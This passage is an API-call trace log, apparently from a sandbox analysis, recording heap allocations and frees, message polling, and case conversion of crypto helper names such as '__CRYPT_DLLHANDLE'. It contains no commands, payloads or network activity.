RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0178.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0178.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0178.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0178.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0178.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0178.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0178.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0178.891] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0178.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0178.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0178.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0178.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0178.892] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0178.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0178.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0178.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0178.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0178.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0178.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0178.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0178.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0178.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0178.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0178.892] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0178.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0178.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0178.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0178.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2878 [0178.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0178.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0178.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0178.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0178.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd438 [0178.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0178.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0178.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0178.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0178.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0178.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0178.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0178.893] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0178.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0178.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0178.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0178.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0178.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0178.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0178.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0178.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0178.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0178.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0178.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0178.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0178.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0178.893] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0178.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0178.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0178.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0178.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0178.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0178.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0178.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0178.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0178.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0178.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0178.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0178.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0178.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0178.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0178.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0178.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0178.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0178.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0178.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0178.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0178.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0178.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0178.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.894] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0178.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0178.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0178.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0178.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0178.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0178.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0178.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0178.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0178.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0178.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0178.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0178.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0178.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0178.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0178.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0178.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0178.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0178.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0178.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0178.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0178.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0178.895] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0178.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0178.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0178.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0178.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0178.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0178.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0178.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0178.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0178.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0178.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0178.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0178.895] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0178.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0178.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd570 [0178.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0178.896] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0178.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0178.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0178.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0178.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0178.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0178.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0178.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0178.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0178.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0178.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0178.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0178.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0178.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0178.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0178.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0178.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0178.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0178.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0178.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0178.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0178.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0178.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0178.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0178.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0178.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0178.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0178.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0178.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0178.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0178.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0178.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0178.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0178.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0178.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0178.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0178.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0178.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0178.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0178.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0178.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0178.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0178.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0178.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0178.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0178.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0178.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0178.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0178.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0178.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0178.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0178.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0178.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0178.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0178.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0178.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0178.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0178.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0178.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0178.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0178.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0178.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0178.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0178.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0178.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0178.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0178.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0178.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0178.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0178.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0178.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0178.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0178.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0178.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0178.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0178.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0178.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0178.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0178.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0178.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0178.899] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0178.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0178.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0178.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0178.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0178.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0178.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0178.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0178.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.900] 